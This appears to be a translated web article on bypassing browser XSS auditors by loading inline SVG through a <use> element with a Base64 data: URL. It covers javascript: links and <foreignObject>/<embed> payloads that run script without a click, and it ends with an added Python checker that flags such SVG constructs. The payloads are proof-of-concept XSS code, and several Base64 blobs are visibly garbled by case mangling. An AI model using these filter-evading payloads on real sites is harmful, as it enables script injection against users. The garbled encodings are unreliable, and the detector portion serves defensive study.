Bypassing browser XSS audits with SVG

Source: Internet
Author: User

The <use> element in SVG reuses other elements, typically ones declared inside <defs> and the like. It can also refer to an element in an external SVG file through that element's ID: in the xlink:href attribute of <use>, the fragment that follows the file name begins with the '#' character. The basic structure of such an external reference is as follows:

Test.html:

<svg><use xlink:href="external.svg#rectangle"/></svg>

External.svg:

<svg id="rectangle"
     xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100">
  <a xlink:href="javascript:alert(location)">
    <rect x="0" y="0" width="100" height="100"/>
  </a>
</svg>

External.svg starts with an <svg> tag whose id is set to rectangle, and a <rect> tag draws a rectangle. Wrapping the <rect> in an <a> element turns it into a hyperlink; because the link target uses the javascript: URL scheme, the JavaScript executes when the rectangle is clicked.

So once the SVG is loaded through <use> and the link is clicked, JavaScript runs. One thing to note: <use> only loads SVG files, and the referenced file must satisfy the same-origin policy.

======================
Firefox
======================

Since the loaded external SVG file must be same-origin, this feature does not look like a useful XSS vector at first. Firefox, however, helps us upgrade it: the data: URL scheme can be used in place of a file on the server, which lets us construct the "file" inline. It requires the right MIME type, here image/svg+xml. After the MIME type comes our payload, or the keyword base64 followed by the Base64-encoded payload. Base64 encoding is especially convenient because it avoids the problem of the payload breaking out of the surrounding HTML structure. Now we no longer have to rely on a second file on the server:

Test.html:

<svg>
<use xlink:href="data:image/svg+xml;base64,
PHN2ZYBPZD0ICMVJDGFUZ2XLIIB4BWXUCZ0IAHR0CDO
Vl3d3dy53my5vcmcvmjawmc9zdmciihhtbg5zonhsaw
5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l3hsaw5ri
Iagicb3awr0ad0imtawiibozwlnahq9ijewmci+dqo8
ysb4bgluazpocmvmpsjqyxzhc2nyaxb0omfszxj0kgx
vY2F0aW9uKSI+ PHJLY3QGED0IMCIGET0IMCIGD2LKDG
g9ijewmcigagvpz2h0psixmdaiic8+pc9hpg0kpc9zd
mc+#rectangle"/>
</svg>

The Base64 payload after decoding:

<svg id="rectangle"
     xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100">
  <a xlink:href="javascript:alert(location)">
    <rect x="0" y="0" width="100" height="100"/>
  </a>
</svg>

The browser displays a black rectangle that pops up location when clicked. But why bother the victim with a click they may never make? <script> tags in external.svg will not be parsed, but SVG supports the <foreignObject> element, which can hold non-SVG content once the required extension is declared through its requiredExtensions attribute. That means <iframe>, <embed> and all the other supported HTML elements become available, and any of a number of them can be used to run JavaScript. Using <embed> together with a javascript: URL, the SVG looks like this:

<svg id="rectangle"
     xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100">
  <script>alert(1)</script>
  <foreignObject width="100" height="50"
                 requiredExtensions="http://www.w3.org/1999/xhtml">
    <embed xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(location)"/>
  </foreignObject>
</svg>

The <embed> tag is loaded through <foreignObject>, and its javascript: URL executes JavaScript. Then, as before, we Base64-encode the payload and load it through the data: protocol. Test.html:

<svg>
<use xlink:href="data:image/svg+xml;base64,
PHN2ZYBPZD0ICMVJDGFUZ2XLIIB4BWXUCZ0IAHR0CD
OVL3D3DY53MY5VCMCVMJAWMC9ZDMCIIHHTBG5ZONHS
Aw5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l3hsaw
5riiagicb3awr0ad0imtawiibozwlnahq9ijewmci+
phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg0kidxmb3
jlawdut2jqzwn0ihdpzhropsixmdaiighlawdodd0i
NTAIDQOGICAGICAGICAGICAGICAGICAGCMVXDWLYZW
rfehrlbnnpb25zpsjodhrwoi8vd3d3lnczlm9yzy8x
OTK5L3HODG1SIJ4NCGK8ZW1IZWQGEG1SBNM9IMH0DH
a6ly93d3cudzmub3jnlze5otkvegh0bwwiihnyyz0i
AMF2YXNJCMLWDDPHBGVYDCHSB2NHDGLVBIKIIC8+DQ
ogicagpc9mb3jlawdut2jqzwn0pg0kpc9zdmc+#rectangle"/>
</svg>
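A defender-side check for the constructs this page relies on, added here as an example that is not part of the original article: it parses an SVG document and flags <script>, <foreignObject>, <use> references to a data: URL or to another document, and javascript: URLs in href/src attributes. The sample documents are constructed from the page's decoded payloads, and the URL normalisation is an assumption modelled on how browsers parse URLs (tab/newline removed anywhere, leading controls and spaces stripped, scheme compared case-insensitively), which is why a plain "starts with javascript:" check is not enough.

```python
import re
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
C0_AND_SPACE = "".join(map(chr, range(0x21)))  # what URL parsers strip from both ends


def normalize_url(url):
    """Mimic URL parsing: ASCII tab/newline vanish anywhere, C0/space at the ends."""
    return re.sub(r"[\t\r\n]", "", url).strip(C0_AND_SPACE)


def audit_svg(svg_text):
    """Return sorted findings for one SVG document; an empty list means nothing flagged."""
    findings = set()
    for el in ET.fromstring(svg_text).iter():
        name = el.tag.rsplit("}", 1)[-1].lower()  # drop the XML namespace prefix
        if name == "script":
            findings.add("script-element")
        elif name == "foreignobject":
            findings.add("foreignObject")  # admits HTML content such as <embed> or <iframe>
        url = el.get(XLINK_HREF) or el.get("href") or el.get("src")
        if url is None:
            continue
        url = normalize_url(url)
        if url.lower().startswith("javascript:"):
            findings.add("javascript-href")
        if name == "use":
            if url.lower().startswith("data:"):
                findings.add("use-data-url")      # whole document inlined, no server file
            elif not url.startswith("#"):
                findings.add("use-external-doc")  # reference into another document
    return sorted(findings)


# Constructed samples modelled on the page's decoded payloads (not the original blobs).
LINK_SVG = """<svg id="rectangle" xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">
  <a xlink:href="Javascript:alert(location)"><rect width="100" height="100"/></a></svg>"""
FOREIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <foreignObject width="100" height="50" requiredExtensions="http://www.w3.org/1999/xhtml">
    <embed xmlns="http://www.w3.org/1999/xhtml" src="&#9;javascript:alert(location)"/>
  </foreignObject></svg>"""
USE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <use xlink:href="data:image/svg+xml;base64,PHN2Zy8+#rectangle"/></svg>"""
CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <defs><rect id="r" width="10" height="10"/></defs><use xlink:href="#r"/></svg>"""
```

Because the same payload can be hidden inside a Base64 data: URL in <use>, reject or rasterize a flagged upload rather than trying to strip individual attributes.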
